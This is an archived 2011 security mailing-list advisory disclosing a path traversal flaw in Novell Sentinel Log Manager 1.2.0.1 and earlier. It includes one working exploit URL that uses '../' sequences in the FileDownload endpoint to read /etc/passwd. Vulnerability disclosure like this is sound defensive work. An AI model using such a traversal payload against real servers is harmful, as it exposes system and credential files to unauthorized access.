lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAP-1Xubm7C1EsEQiPKe37DqHc41v3d8xs065sGreO99R=D3VNg@mail.gmail.com> Date: Sun, 18 Dec 2011 16:25:14 +0100 From: Andrea Fabrizi <andrea.fabrizi@...il.com> To: websecurity@...appsec.org, bugtraq@...urityfocus.com, webappsec@...urityfocus.com, full-disclosure@...ts.grok.org.uk Subject: Novell Sentinel Log Manager <=1.2.0.1 Path Traversal ************************************************************** Vuln: Path Traversal Application: Sentinel Log Manager Vendor: Novell Version affected: <= 1.2.0.1 Website: http://www.novell.com/products/sentinel-log-manager/ Discovered By: Andrea Fabrizi Email: andrea.fabrizi@...il.com Web: http://www.andreafabrizi.it ************************************************************** The latest version of Sentinel Log Manager is prone to a Directory Traversal, which makes it possible, for Authenticated Users, to access any system file. Testing environment: Sentinel Log Manager Appliance 1.2.0.1 Vulnerable URL: /novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists